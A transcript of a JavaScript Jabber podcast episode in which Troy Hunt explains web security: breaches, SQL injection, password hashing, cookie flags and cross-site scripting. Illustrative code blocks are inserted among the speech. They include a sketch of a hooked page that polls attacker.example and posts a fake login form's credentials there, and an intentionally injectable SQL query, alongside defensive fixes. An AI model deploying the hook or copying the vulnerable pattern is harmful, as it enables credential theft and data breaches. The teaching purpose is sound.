Show Notes

02:32 - Troy Hunt Introduction
04:12 - Why should people care about security?
06:19 - When People/Businesses Get Hacked
09:47 - “Hacking”
11:42 - Inventive “Hacks”
13:24 - Motivation for Hacking/Can hacking be valuable?
17:08 - Consequences and Retribution
19:10 - How to Build Secure Applications
20:47 - Weighing in UX
22:50 - Common Misconceptions
  • Password Storage
  • Encoding
  • Cookies
31:27 - Passwords (Cont’d)
33:16 - Justifying the Importance of Security
35:24 - Client-side Security
44:10 - Resources
45:27 - Routing
47:21 - Timeouts
51:36 - Cached Data
Picks
Special Guest: Troy Hunt.

Transcript

 [This episode is sponsored by Frontend Masters. They have a terrific lineup of live courses you can attend either online or in person. They also have a terrific backlog of courses you can watch including JavaScript the Good Parts, Build Web Applications with Node.js, AngularJS In-Depth, and Advanced JavaScript. You can go check them out at FrontEndMasters.com.]

[This episode is sponsored by Hired.com. Every week on Hired, they run an auction where over a thousand tech companies in San Francisco, New York, and L.A. bid on JavaScript developers, providing them with salary and equity upfront. The average JavaScript developer gets an average of 5 to 15 introductory offers and an average salary offer of $130,000 a year. Users can either accept an offer and go right into interviewing with the company or deny them without any continuing obligations. It’s totally free for users. And when you’re hired, they also give you a $2,000 bonus as a thank you for using them. But if you use the JavaScript Jabber link, you’ll get a $4,000 bonus instead. Finally, if you’re not looking for a job and know someone who is, you can refer them to Hired and get a $1,337 bonus if they accept a job. Go sign up at Hired.com/JavaScriptJabber.]

[This episode is sponsored by DigitalOcean. DigitalOcean is the provider I use to host all of my creations. All the shows are hosted there along with any other projects I come up with. Their user interface is simple and easy to use. Their support is excellent and their VPS’s are backed on Solid State Drives and are fast and responsive. Check them out at DigitalOcean.com. If you use the code JavaScriptJabber you’ll get a $10 credit.]

[Let's face it. Bookkeeping is hard and it's not really what you're good at anyway. Bench.co is the online bookkeeping service that pairs you with a team of dedicated bookkeepers who use simple, elegant software to do your bookkeeping for you. Check it out and get your free trial today at Bench.co. They help you focus on what matters most and that's why they're there. Once again that's Bench.co.]

JOE:

Hey everybody and welcome to episode 201 of the JavaScript Jabber Show. Today on our panel we have Aimee Knight.

AIMEE:

Hello.

JOE:

And I am Joe Eames. I'm going to be your host today. We're running on a bit of a skeleton crew which is great because we have the most important panelist, Aimee. And that's all that matters. [Laughter]

JOE:

And as our very special guest today, we have Troy Hunt.

TROY:

Hey guys. Thanks for having me.

JOE:

Now, we're here to talk about security but before we get into that, could you take a brief moment? Maybe give us a little bit of a background in yourself, why this topic is of interest to you and your experience with it.

TROY:

Yeah, sure. So, I have a predominantly development background. I started building for the web… wow, '95 now, just realized it's 21 years. I kept saying 20 but [laughs] we've ticked over. So, I've spent a lot of time building for the web. Probably for the last decade I've been a lot more security focused. I'm now an independent trainer who writes a lot of courses for Pluralsight online, so in fact a bunch of what we're going to speak about today is no doubt in my Pluralsight courses. And I travel around the world doing conferences and workshops and security things.

JOE:

Wow. So, does that essentially occupy a hundred percent of your time?

TROY:

Yeah, between those things it does. For the last, let me see, since April 2015 I've been independent. For about a decade and a half before that, I was in big corporate at Pfizer pharmaceuticals. And I was looking after their application architecture for the Asia-Pacific region. And then I made the move to go and actually do what I want [laughs] on my own terms which I am extremely happy about. And now all of that yeah, does occupy all my time. So, I've just pushed out my 20th Pluralsight course. And we're at the middle of Feb now. And so far I've spent about a month this year [chuckles] overseas doing training and workshops and conference talks. That is occupying a rather significant portion of my time at the moment.

JOE:

That's awesome. Cool, well let's get into talking about security. First I think it would be nice maybe if you just gave us a brief overview of the importance of security. Maybe like your… since you said that you've given a lot of talks, the 30-second bit about why people should really care about security.

TROY:

Well, I think the thing at the moment is that it's such a headline every single day. Even before I got on the call here, I'm reading Twitter and there's a hospital which is infected with malware and a three and a half million dollar ransom that's sitting out there. And this stuff is not just tech news stories. This is sort of mainstream news. And if we think back just to the last year, about how much all of us, even as consumers, our non-technical significant others or family, have been exposed to really serious security incidents, things like Ashley Madison, TalkTalk in the UK, obviously we had things like the Sony debacle a little bit earlier, it is just absolutely pervasive at the moment, the attacks against online systems. So, it's impacting all of us whether we're consumers using these systems or whether we're developers building them. And it's something that we clearly have a really serious problem with at the moment.

JOE:

Yeah, that's quite true. Another interesting one I think was Sony, the Sony hack.

TROY:

Yeah, that was bizarre in so many ways, to have on the one hand defacement and demands to take down movies, and then on the other hand for it to have turned out to likely [chuckles] be state sponsored by North Korea. It's just so bizarre in so many ways. And the really weird thing is we keep seeing these instances and going, “Well this is just unprecedented. This is crazy,” and then something else unprecedented comes along. Ashley Madison was unprecedented. We had over 30 million people with really sensitive personal details exposed. And then a few months ago the VTech toy manufacturer was unprecedented. We had hundreds of thousands of kids exposed. And yeah, it just seems like on a very regular cadence, there is something that comes out and we go, “Wow, I never saw that coming. This is crazy.” Look, it's early in 2016 yet but we're going to see a lot more of it this year no doubt.

JOE:

So, when you hear about one of these big major hacking events like Ashley Madison for example or Sony, do you always kind of in your mind think, “Wow, those guys. They did a terrible job on their security”? What goes through your thoughts when you hear one of these big major events?

TROY:

Well, I'm always curious. And of course myself and a bunch of other people in the security, and [6:38] development communities as well, always want to know the details, right? So, what happened? What went wrong? And very often we get to find out by courtesy of data being dumped. So, we get to see what was inside their internal system. And very often we see code being dumped as well, plus we frequently see particularly when it's this class of hacker we know as the hacktivist, we very frequently see them talking about how they exploited the system. So, I'm always sort of curious. And I guess in fairness, the levels of egregiousness, in terms of how bad the security is, differs wildly.

So, on the one hand I can think of say Patreon last year. Patreon takes payments for fledgling artists so it's like crowd-supporting an artist. I was [chuckles] unfortunately in that data breach because I'd supported someone. And you look at what they did and they actually had a pretty good setup. They had everything encrypted in terms of any personally identifiable info. They had great hashing for their passwords. They just made one bad mistake. And of course, it only takes one. But the one bad mistake, putting debug settings in a production-facing environment, that was the gateway. But we're sort of interested in that from the perspective of, here's an organization that's actually done a pretty good job.

And then at the other end of the scale you take someone like VTech the toy maker and these guys have got no encryption anywhere on their connections. They've got direct object reference risks where you change a number in the URL, you get someone else's data. They had SQL injection risks. Even when you login to the system, they are returning these SQL statements that were run against the database in the API response, which is just [laughs], it's just bizarre. I can only speculate as to why that even made sense.

JOE:

Geez.

TROY:

And then you look at that and you go, “How did you guys not get owned much, much earlier?” And hey maybe they did and we just didn't know about it. But look, we just see a massive breadth of competency and a massive breadth of the sophistication required to actually break into the system in the first place.

JOE:

So, there's so much about this and one of the cool things about these sorts of things is the stories that get told like you said. Like, you could make movies about these hacking events. Like, I can totally imagine a movie about Sony getting hacked, right?

TROY:

Yeah, probably. I guess we've seen various classes of hacking movie that frankly have been pretty terrible [laughs] [inaudible] in the past.

JOE:

[Laughs]

TROY:

But yeah, so anyway that'd be a very meta sort of movie, wouldn't it? A movie about the hack which was brought about by the movie about attacking North Korea. [Laughs] It got a little bit cross-eyed. But some of it is stranger than fiction. And some of it is enormously intriguing as well. So, things like the Stuxnet attacks against nuclear power facilities in Iran some years ago, certainly state-sponsored, likely the US and Israel, yeah actually attacking air-gapped machines that run centrifuges to make them spin at a rate that was too fast and burn out motors. That stuff is very, very, it's almost sort of science fiction. But it's actually happening in real life.

JOE:

There's kind of probably a wide gamut of hacking. Obviously there's the social engineering hacking which I recently saw a crazy inventive one where somebody had sent what looked like a Google Doc invite and you click on it and then they ask you to log into your Google Drive account, which I just knew myself I shouldn't have to login. I'm already authenticated. So, the fact that they're asking… and then I just glanced, I didn't think to glance at the URL until that point, but the URL was not Google's URL.

TROY:

[Chuckles] So, that's a perfect example. I just published a couple of courses on social engineering actually. But it's a really good segue into something JavaScript as well, because you just made me think of a very cool framework that's JavaScript-driven that allows social engineering of that type. So, there's a project called BeEF Project, B-E-E-F project. And the BeEF Project is an exploit framework where if you can embed a JavaScript file into the target website, so for example if you can get in the middle of the traffic or in the middle of the connection, or if you can use a cross-site scripting attack and you can get that file loaded by the client, it gives you a persistent hook. And the browser keeps calling back to a command and control web server.

And then you as the attacker, you sit there and you have this nice little responsive UI. And you can see who has now been hooked. And then when they hook, you click on their IP address and you say, “I would like to send you a test social login.” And what happens is that the page you're on has a little Facebook modal pop up in the middle of the screen, or it reloads the entire page to the Google login page. And unless you're explicitly looking at the URL and you're looking for the right domain and you're looking for a security certificate, you'd be fooled. And you'd have exactly that situation you just spoke about there.
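
To make the mechanics of that concrete: the following is not BeEF's actual code, just a minimal sketch of the idea under discussion. Once an attacker gets a single script file loaded into the victim page, via cross-site scripting or by tampering with the connection, that script can keep polling a command-and-control server and rewrite the page on demand. The attacker.example domain and the command names here are hypothetical.

```javascript
// Hypothetical sketch of a "hooked" page, NOT BeEF's real hook.js.
// Everything below runs with the full privileges of the victim page.
(function poll() {
  fetch('https://attacker.example/command')        // call back to the command-and-control server
    .then(function (res) { return res.json(); })
    .then(function (cmd) {
      if (cmd && cmd.action === 'fake-login') {
        // Rewrite the DOM with a bogus login form that posts to the attacker.
        document.body.innerHTML =
          '<form action="https://attacker.example/steal" method="POST">' +
          '<input name="email" placeholder="Email">' +
          '<input name="password" type="password" placeholder="Password">' +
          '<button>Sign in</button>' +
          '</form>';
      }
    })
    .catch(function () { /* swallow errors and keep polling */ })
    .then(function () { setTimeout(poll, 5000); }); // the "persistent hook": keep calling home
})();
```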

JOE:

Geez, that's crazy.

TROY:

It's kind of cool. It's kind of awesome. Go and have a look at BeefProject.com. [Laughs] It's pretty neat.

JOE:

Cool. So, that sort of makes me think what are some of the most inventive types of hacks that you've seen?

TROY:

Well, that one's always kind of interesting. I guess some of the ones that maybe we sort of start with the basic ones. The ones that are just very, very successful and seem to keep appearing over and over again are things like SQL injection. So, SQL injection has been around for well and truly over 10 years. We've been very conscious of the risks. Really, it's gone back since we've created data-driven websites. And we're seeing that one over and over again. And I guess what's curious about that is how accessible it's becoming to people.

So, we're seeing incidents like TalkTalk, the [inaudible] UK Telco, made a lot of news a few months ago because a 15-year-old was able to break into their system using SQL injection. And I guess what's inventive about that is that we've seen tools emerge that make this process extremely simple. So, tools like sqlmap. And sqlmap is very good whether you're a penetration tester doing good things or whether you're a 15-year-old kid doing bad things, it's very good just to point to the URL and [suck data out]. And so, I think that's inventive from the tooling perspective.
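
For anyone who hasn't seen the underlying flaw, here is a minimal, deliberately vulnerable sketch of the kind of endpoint those tools hunt for: a query built by concatenating a URL parameter straight into SQL. The route, table, and db handle are all hypothetical; a parameterized version comes up later in the conversation.

```javascript
// DELIBERATELY VULNERABLE sketch -- do not copy this pattern.
// GET /products?id=42 behaves as expected, but
// GET /products?id=42 OR 1=1 (URL-encoded) returns every row,
// and a tool like sqlmap will automate far more damaging payloads from there.
app.get('/products', function (req, res) {
  var sql = 'SELECT * FROM Products WHERE Id = ' + req.query.id; // untrusted input concatenated into SQL
  db.query(sql, function (err, rows) {
    if (err) { return res.sendStatus(500); }
    res.json(rows);
  });
});
```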

And then obviously at the other end of the extreme, things like we just mentioned, Stuxnet. So, state-sponsored malware designed to infect air-gapped machines which would then actually make [inaudible] systems that control things like nuclear… uranium I suppose. I'm not a nuclear guy. [Chuckles] But making the enrichment of nuclear fuels, making those centrifuges over-spin and actually burn out motors, that is very freaky stuff. That is very sci-fi stuff.

AIMEE:

So, you talked about a 15-year-old and then you talked about this. What do you think the motivation is for the majority of cases?

TROY:

Well, I reckon in the cases where we're talking about… let's call them this collective of hacktivists if you like. In the case we're talking about hacktivists we're often looking at kids. I think it's nothing more than curiosity. I really do. And on the one hand you kind of want to say, “Look, go to your room and think about what you've done,” [chuckles] because they're doing enormous damage.

AIMEE:

[Chuckles]

TROY:

But on the other hand I can sort of understand that it is just a childish curiosity a lot of the time. And particularly when we're talking about that age, 15, 16 years old. And we've all been there. We've all gotten up to trouble before. But probably before we had access to the internet like we do today, fortunately before camera phones as well. But anyway, [chuckles] I think in those cases a lot of the time it is just curiosity. They're sort of finding their way online. They're often being coerced by other people as well. They're in there on forums chatting to people. And when it comes down to something as simple as, “Here, download this free software which will take you 60 seconds and now copy and paste this URL into it,” that's all it's taking.

And I guess what concerns me a little bit in these cases as well is that these kids are often getting the book thrown at them. They're getting records. They're sometimes getting custodial sentences for something which on the one hand yes is malicious and damaging yet on the other hand is probably not reflective of longer-term criminal aspirations.

AIMEE:

So, as far as that point too, it seems like although the stuff is bad in a way, it can be valuable because the threat forces you to think more carefully about what you're doing.

TROY:

Well, you'd hope so. And I guess this is the really poignant thing here. If these organizations are getting owned by 15, 16-year-old kids, what are they doing?

[Laughter]

AIMEE:

Yeah.

TROY:

What is going so wrong that a kid in their bedroom, and in this particular case it was a kid in Belfast who broke into TalkTalk I assume in his bedroom because where else are you going to be hacking from [chuckles] when you're a 15-year-old kid?

JOE:

Right.

TROY:

They don't have lairs or things like that.

JOE:

[Laughs]

TROY:

So [chuckles] to be able to do that to organizations like that, same sort of thing with VTech in terms of the ease of exploitation, same sort of thing with many of these other companies, there is something fundamentally wrong inside the organization that's allowing this to happen. And there's a bit of a risk of people calling this victim-blaming because certainly the likes of TalkTalk were victims of this attack as well. But there was undoubtedly significant negligence in order for that to happen in the first place.

JOE:

Right. Well, there are a couple of things going on there, right? It's not like the 15-year-olds are truly acting in isolation because they're probably using tools written by much more experienced and smart people. Well, maybe not smart but more experienced hackers, right? They're jumping on a simple wave.

TROY:

Yes and no. There's certainly a degree of that which is true, which is other very smart people have written the tools. And they are very sophisticated tools in some cases. Things like sqlmap are enormously powerful. Yet on the other hand, the kids are falling into these circles. They're having communications with other people that are teaching them how to use them. They are consciously going out and looking for these websites to exploit. We're seeing them, for example, very frequently using Google dorks. So, Google searches that are very carefully crafted in order to find sites that are likely at risk. There is a conscious exploration that they're going through. But I think that when they're doing this, they're just not quite savvy enough or aware enough of the consequences.

JOE:

Yeah, and that's another interesting thing, right? With a teenager we're talking about somebody that hasn't yet gone through much of life. Their prefrontal cortex has not fully formed.

AIMEE:

[Laughs]

JOE:

So, making informed judgments is a little bit less… for example if your bank happened to keep its vault, not just the doors open but the money maybe out on a table…

TROY:

[Laughs]

JOE:

Then if anybody that grabbed some money and walked out got arrested and thrown in jail for 30 years, you might think that's a little unfair, right?

TROY:

Well, this is the problem, because yes and no. [Chuckles] If you've consciously gone and stolen the money or the data or whatever sort of paradigm you're going to compare it to, then clearly you've committed a crime. And you've got to have some form of retribution. Something has got to happen. I guess the bit that's increasingly frustrating me is that the folks that are proverbially leaving this money out on the table, what's happening to them? Because it is impacting their customers in a very negative way. We take the VTech thing with the kids. So, here's a company that's making little tablets. So, imagine if Fisher-Price was to make an iPad. Picture what it would look like. Lots of bright colors and lots of plastic and so on. And they're making this and collecting kids' data and then not looking after it properly. And so far, they've arrested the alleged hacker in the UK and we've not seen any more news on that. But the thing I haven't seen any news on is what's happened to VTech? So, who is going to hold them accountable for the loss of this data? Because this is kids' information. And look, there are some moves afoot. We're seeing in the EU for example, we're going to see fines apparently of up to about four percent of gross revenue come 2018 for organizations that do lose data in this way, which hopefully might make some difference. But to date we've seen very, very little retribution against organizations that have proverbially left the money out on the table and then someone's walked along and grabbed it.

AIMEE:

So, the stuff that I kind of wanted to talk about, if you're on a greenfield project, how do you go about securing things? Do you just go little by little and build it up over time? What is your approach that you recommend?

TROY:

Look, if you're on a greenfield project, you've got a little bit of luxury in that you don't have any sort of legacy dependencies to deal with. And what we'd really like to see there is that, to me, it all starts with the developers. So, that's the point at which code is actually written. And that could be good code, it could be bad code. So, that's if we're talking about a greenfield project.

If we're talking of brownfields, the code that we've already got, legacy code for want of a better word, it becomes a much harder problem, because now you've inevitably got a whole bunch of different issues spread throughout the codebase. And this is a place where things like automation can help. So, automated tools, tools such as dynamic analysis where you'll run various products against a live running website and it will pick up things like SQL injection and cross-site scripting, or tools like static analysis. So, tools that will actually read source code and come back and identify risky patterns.

So, there's a bit of a combination of approaches there, depending on where you are in the life cycle. And ideally you'd want to try and have a combination of competent professionals and effective tools that you'd run throughout the project, as soon as you can. And that's going to start to move the needle in the right direction. None of these things are a panacea either. I think some people would really like to get security in a box and unfortunately it's not quite that simple.

AIMEE:

So, my only other question on this topic right now is how do you weigh in UX? So, some things there's really no wiggle room. But then for other cases, especially if you're on a greenfield project and you want to increase users, how do you weigh the trade-offs UX-wise? I know you've mentioned before, obviously 2-factor auth is a gigantic pain in the butt. But it's also really valuable. So, I'm trying to think of other situations like that. Maybe you have better examples, because that's not the best one.

TROY:

Okay, so you mean in terms of when there is a UX compromise in order to add security?

AIMEE:

Yes.

TROY:

So, I think the answer is it can be done in degrees and increments. So, let's take something like multi-step verification. I have that available on my Facebook. I can't remember the last time I actually needed to use it, because I login with my PC that's sitting here on my desk in my office. And until I actually fire up a totally new browser, a totally new machine, I won't need to enter it again. So, they've got an approach where they say, “Look, let's just make sure that for each new machine that we identify we go through the two-step dance. And we know who you are and then we're good.” Now compare that to something like every time I log onto my Microsoft Azure account which manages all of my web assets, I have to enter it every single time. Different levels of criticality and in each case they've decided that there's going to be a different challenge requirement.

So, one of the things you can always think about is rather than it being sort of a boolean state, “Do we have to challenge people every single time?” “Can we challenge them at points where we need that additional verification based on the nature of the app?” So, I guess the point there is to try and tailor it to what it is that you're building because ultimately the security is great but if people don't like using the system you've probably got an even bigger problem.
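
To sketch that "challenge only where it matters" idea in code, here is a hedged Express-style example. It assumes a hypothetical app with session state, and showDashboard and performTransfer are placeholder handlers; only high-impact actions force a fresh second-factor check, so everyday browsing stays frictionless.

```javascript
// Hypothetical middleware: only demand a second factor when the action is
// sensitive and the last verification is older than the allowed window.
function requireRecentSecondFactor(maxAgeMs) {
  return function (req, res, next) {
    var verifiedAt = (req.session && req.session.secondFactorVerifiedAt) || 0;
    if (Date.now() - verifiedAt < maxAgeMs) {
      return next(); // verified recently enough, no extra friction
    }
    res.status(401).json({ challenge: 'second-factor-required' });
  };
}

// Low-risk route: no additional challenge.
app.get('/dashboard', showDashboard);

// High-impact route: require a verification from within the last five minutes.
app.post('/payments/transfer',
  requireRecentSecondFactor(5 * 60 * 1000),
  performTransfer);
```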

JOE:

Good answer. So, one question I'd like to ask is whether there may be some common misconceptions out there about what it takes to build something secure, like things that people do thinking they're making things secure but either they're not or they're even making it worse. And then do you have any personal pet peeves when it comes to people's security practices?

TROY:

Yeah, good question. And the first misconception actually [chuckles] that I think we should spend a little bit of time on is the misconception that security has to cost money. So, this is something I often hear people say, it's almost like, “Well we could build it securely but then we'd have to pay more money.” And I'm going, “Well, hang on a second.” [Chuckles] Let's look at the things that people get wrong in software and think about whether it actually is more expensive to do it right.

So, let's look at something like SQL injection. Does it actually cost more money to have your queries properly parameterized? Well, very often it's actually more efficient because these days people use a lot of things like object relational mappers, ORMs. So, they get the data from the data tier through to the app tier, which is actually a fairly expeditious way of writing code. And when you do that, you almost certainly have no SQL injection risk because things like parameterization are done automatically for you. So, that's very efficient.
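
To make the "secure isn't more expensive" point concrete, here is the same kind of lookup from the earlier SQL injection sketch written with a parameter instead of concatenation, roughly what an ORM is doing for you under the covers. The ? placeholder syntax is an assumption about the database driver in use.

```javascript
// Parameterized version: the driver sends the value separately from the SQL text,
// so input like "42 OR 1=1" is treated as data, never as part of the query.
app.get('/products', function (req, res) {
  db.query('SELECT * FROM Products WHERE Id = ?', [req.query.id], function (err, rows) {
    if (err) { return res.sendStatus(500); }
    res.json(rows);
  });
});
```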

Little things like, “Do we just put HTTPS over the entire site?” If you make your entire site HTTPS it's very, very easy. Yeah, everything just requires a secure connection. There's no trying to jump in and out of secure versus insecure. That's dead simple. And it's a very secure way of making it a default secure experience. So, that's probably one of the first things.

I think then in terms of areas that developers often get things wrong, one thing that comes to mind is password storage. And very often we see passwords stored in an insufficient fashion. So, we still see a lot of plain text. Last year we had the 000webhost data breach. 13 million accounts with passwords in plain text. So, no protection whatsoever which is just, yeah I was going to say unheard of. Unfortunately it's not unheard of. But it's unimaginable [chuckles] that you would have this now. Sometimes we see it encrypted which is pretty useless also, because as soon as the system gets broken into and comprehensively compromised and private keys get extracted, well everything gets decrypted.

And then we see different levels of understanding in terms of hashing algorithms. So, people will say, “Well, MD5 is weak so we shouldn't use MD5. But if we use salted MD5 we're fine.” And then it's like, well, hang on a second. You can calculate multiple billions of MD5 hashes a second. Just a couple of weeks ago, I wrote about a number of vBulletin data breaches I've been looking at that use salted MD5 and showed how fast I could crack those. And people were amazed. It's like, well yeah, you can calculate multiple billions per second. You're going to crack them pretty quick.

So, a lot of developers don't understand about the existence of adaptive hashing algorithms, so hashing algorithms like bcrypt where you can actually force them to run very, very slow. So, if anyone gets your passwords that are hashed in the system, it is extremely difficult to actually extract much of value out of them. So, I think that's one of the areas they get things wrong. And that probably also answers the misconception question as well. This is one of the things that people building systems frequently don't understand, how weak most of their password storage is.
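
As a concrete contrast with a fast hash like salted MD5, here is a minimal sketch using the bcrypt package for Node; any adaptive algorithm such as scrypt or PBKDF2 illustrates the same point. The cost factor makes every single guess deliberately slow.

```javascript
var bcrypt = require('bcrypt');

// The cost factor (12 here) makes each hash deliberately expensive to compute,
// so an attacker with a stolen database gets far fewer guesses per second
// than the billions per second possible against MD5.
function storePassword(plainText, done) {
  bcrypt.hash(plainText, 12, function (err, hash) {
    if (err) { return done(err); }
    done(null, hash); // persist the hash, never the plain text
  });
}

function checkPassword(plainText, storedHash, done) {
  bcrypt.compare(plainText, storedHash, done); // done(err, true|false)
}
```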

JOE:

Interesting. I certainly had no idea about that MD5 thing.

TROY:

Yeah, it's curious. And if you go and look at a piece of software like Hashcat, so at Hashcat.net you can find Hashcat which is free, open source hash cracking software, very, very good hash cracking software. It's what the pros use. Have a look at just how fast some of these hashes can be calculated. And we're talking about a consumer-level graphics card from five years ago being able to calculate somewhere in the order of about eight billion MD5 hashes a second. And when you can have that many guesses at what a password is per second, it doesn't take you too long to crack a significant portion of passwords in a typical system.

JOE:

Wow. So, does that mean… I assume that this is true that there are a lot of places where people might go and turn to, “Alright, what's the security best practices?” and find actual misinformation as well?

TROY:

Yeah. That actually happens quite a bit. And then I tweet about it profusely. [Laughs] And then hopefully…

JOE:

[Laughs]

TROY:

That changes things. There are a couple of examples that come to mind. In fact, I've got a talk I've been doing called '50 Shades of AppSec' and I show these, 50 various security [inaudible] things.

JOE:

Gosh.

TROY:

Look it up, if anyone wants to watch it. There are a few recordings of it. It's really good fun. But [chuckles] there's a few examples in there about some of the public advice we get about security. So for example, I've got a Stack Overflow response in there. And someone asked the question, they said, “I'm trying to store passwords in my system. How do I do it?” And this person comes along and says, “Alright, well here's what you do.” And it was a very, very fast answer too, so someone's copied and pasted their code. They say you take the password and then you go through and you get the ASCII value of each character and you add five. [Laughs] And then what you do is you store that in the database. And we'll call the function encrypt and that way it's encryption. [Chuckles]

JOE:

[Chuckles]

TROY:

And then in order to decrypt you go through and you get the ASCII value of each character and you subtract five. So, we see that same question actually had another response that was basically just Base64 encoding. [Inaudible]

JAMISON:

You mean Base64 encrypting. [Laughter]

TROY:

Well, they did call the method encrypt. So, I'm not sure if that really… no, that doesn't help. [Chuckles] So, we see stuff like that. Some other really interesting examples in that same talk, I've got a screen cap of…

JAMISON:

No actually, can I stop you for one second?

TROY:

Yeah, sure.

JAMISON:

We're all laughing about this. There might be people that don't know why that's a bad idea. Do you want to talk really quick about why that isn't a thing you want to do?

TROY:

Well, because encoding, the problem with encoding is you have decoding. [Chuckles] So yeah, encoding is just meant to encode a character set into another common character set. So for example, Base64 you're going to encode everything into ASCII characters. And that's going to be great insofar as you can hand around other character sets in a fashion that anything that's just speaking ASCII can understand. So, you'll often see encoding so that you don't need to worry about multi-byte character sets and things like that. But the problem is that you literally just go and Base64 decode. And I've seen examples obviously of password storage done in Base64 which may be relevant insofar as narrowing everything down or distilling everything down  into a common character set. But it's useless in terms of privacy and confidentiality.
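
A two-line Node sketch of the point: Base64 is a reversible transformation with no key involved, so it offers no confidentiality at all.

```javascript
// Base64 is encoding, not encryption: there is no key, so anyone can reverse it.
var encoded = Buffer.from('P@ssw0rd!').toString('base64');
var decoded = Buffer.from(encoded, 'base64').toString('utf8');
console.log(encoded, decoded); // the "protected" value, and the original recovered with no secret at all
```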

I've seen other cases where people have done things like the remember me feature on a web page, in fact Black & Decker used to do this, I wrote about that in a blog post. So, the remember me feature when you logged in and you check that little box that says 'Log me in automatically next time', they're actually saving the username and the password in a cookie with Base64 encoding, not flagged as HTTP only either. So, when you have a cookie that's not flagged as HTTP only, you can write client script to access it. So, you have one cross-site scripting risk and now someone can start sucking passwords out of your cookies.
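
The defence Troy is describing costs one line. A hedged Express-style sketch, assuming the standard res.cookie API and a sessionToken value that already exists:

```javascript
// With httpOnly set, document.cookie can never see this value, so a single
// cross-site scripting flaw can no longer be used to lift it from the browser.
// secure keeps the cookie off plain-HTTP connections as well.
res.cookie('session', sessionToken, {
  httpOnly: true,
  secure: true
});
```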

JOE:

Yeah. [Laughter]

JOE:

That's [inaudible].

TROY:

That's one way of putting it.

JOE:

That's a delicious cookie.

TROY:

So, that's a common set of misconceptions. There are some really interesting things we see even on the consumer side of things. I'm just thinking about some of the slides from that talk. [Chuckles] There's one in there where there's an HDMI cable and it's an HDMI cable in typical packaging. And I don't know if anyone's bought an HDMI cable lately but the amount of FUD around HDMI cables, about these ones are gold or nickel-plated or whatever so that the digital signal is not disrupted in any way…

JAMISON:

It gets massaged by the luxurious materials.

TROY:

[Laughs]

JAMISON:

Each byte carefully handcrafted.

JOE:

[Laughs]

TROY:

Anyway, the packaging on this HDMI cable explains how the cable has anti-virus protection, which is just such an unfathomably stupid thing for a manufacturer to put on a package.

JOE:

[Laughs]

TROY:

Yet on the other hand I can understand a layman looking at this and saying, well maybe this is good because this other one over here doesn't have anti-virus protection. And they're not necessarily going to understand why that's just an outrageous claim.

JOE:

[Chuckles] That's awesome. So, this is everything that I know about security. If I make sure they have a capital and a number in their password, then that's secure, right?

TROY:

Yeah, capital P for password, put a one at the end. [Chuckles]

TROY:

Well look, this is part of the problem. And passwords in particular, and I guess passwords are sort of the most prominent place that people touch security. So, everyone who has an internet presence has passwords. That's sort of their [inaudible] to security. And unfortunately we're sort of in this situation where passwords have become something that is both a necessity and an evil. And we really don't have a better mousetrap yet. We've got things like multi-step verification that sit on the back of it. We've got biometrics, particularly things like, say, Touch ID on iDevices, which work very, very well. Yet we still depend on passwords at some point in time.

And even the prevalence of good password managers still doesn't solve the problem when you've got everyday consumers trying to create things that they can remember.

JOE:

Right. It's a big problem. I've gotten hacked myself a couple of times and one was because my username and password got reused on a different site. So, somebody hacked a really low-security place and then used it someplace that was a little bit more high security.

TROY:

Yeah. And you know, that raises one other point as well insofar as… I see a lot of times people create a website and they say the information on this site is not particularly valuable. So, we're not going to worry as much about security. Or alternatively you'll see an individual say, “My information on this site isn't quite as valuable so I'm not going to worry too much about the strength of my password,” without realizing the broader impact on the ecosystem. Your website gets hacked and then the passwords that you're storing for other people get exploited in other places. So, you've sort of got a social responsibility that goes beyond your own site.

JOE:

So, that leads me into one thing I did want to ask and then after that I think we want to switch the topic a little bit to more client-side. But that is if your company has the attitude of, “Hey, what we've got is very low-security, low importance. Let's not worry too much about security,” how do you either as a developer at a company like that justify that it is important? Or is there a bang for the buck that these types of companies can engage in? And I think there's a specific question I want to ask with that, and that is: Is it better to store usernames and passwords yourself or is OAuth better for them to handle?

TROY:

Well, they're all just different, right? So, in terms of the first point about an organization thinking their security profile isn't that important, to my earlier point for the most part it's not going to cost you any more to do things securely. The difference is simply the people building the systems having some competence in terms of what the secure patterns look like. So, it doesn't have to be a cost when there are competent people involved. So, that's the first thing.

And then in terms of if we go down this OAuth and we use say social providers for login, that can be great. It solves a bunch of problems for you. You no longer have to store a password, do password resets, implement multi-factor verification, all the other stuff that goes with account management. So, that's fantastic. The counter-problem that you have to deal with, is that a usability barrier for my users? So for example, if you had a lot of, let's say you had a very elderly audience who may not want to… who may not even have Facebook accounts and the like in the first place, or who may not feel comfortable using social credentials in order to log onto your website, that could be a problem.

But the other option as well is using identity services. So, I'm a Microsoft-y sort of guy. If I was in Azure I could use Azure Active Directory and still have my own interface that sits on top of the whole thing. But they take care of all the mechanics underneath. So, there are middle grounds that you can find to try and divest yourself from some of the responsibility of managing this stuff and still have a nice user experience.

JOE:

Cool.

JAMISON:

So, it sounds like we've talked a little bit about some server-side related things. There's a lot that goes into implementing secure password storage. You talked about SQL injection. With the move towards putting more and more logic in the client in JavaScript and the browser, what kind of security practices does that bring with it?

TROY:

Yeah, good question. There's a few ways we could go with this. So, one way is to start first of all by thinking maliciously about what you could do if you could run script on the client. And this is sort of one of the things that I often ask in my workshops. And people, they sit there and they think a little bit. [Chuckles] And the easy answer is that if an attacker has the ability to start running arbitrary script in the client they can do just about anything. So, they can rewrite the DOM. They can add elements to the page, remove elements. They could pop up a social login like we spoke about before. They could access any cookies that aren't HTTP only. They could do an enormous amount of stuff. So, when we start to think about the client we then say, “Okay, well, what are the sorts of risks which can exploit that client and what defenses do we have?”

So, a really good example I mentioned earlier on, we've got things like cross-site scripting risks. Now we can have cross-site scripting, or XSS as you'll often see it referred to, as a reflected risk. So, someone goes to a URL, the URL contains a string that is then reflected in the response. So, if you look at say any Google search query, you'll see your search query in the URL. That then gets shown in the HTML response. If you could possibly change that search query to say a script tag and then execute anything that you would like to in the browser, well then you've got a problem. Because now we might be doing things like accessing cookies and sending them off somewhere else. So, that would be reflected cross-site scripting.

Then there's persistent cross-site scripting, where you put this in the database. So, what if you can leave a comment on a website and that comment is just a script tag? And then you go and write whatever JavaScript you want and perform any actions whatsoever that you would like on the client.

And the other one that's a little bit less common is a DOM-based cross-site scripting attack as well. So, what if you could modify the DOM by various processes? And let's say you've got something like Angular running. Angular takes input, it renders it into the DOM, and you're actually able to modify the structure of the page. So, we've got several different classes of risk there. One thing that's come along recently in terms of client-side defenses, though it's not yet very widely implemented, is called Content Security Policies or CSPs. So, what you can do with a CSP is you can actually instruct the client in terms of what it is allowed and not allowed to do. And when we speak about clients we're predominantly talking about browsers here.

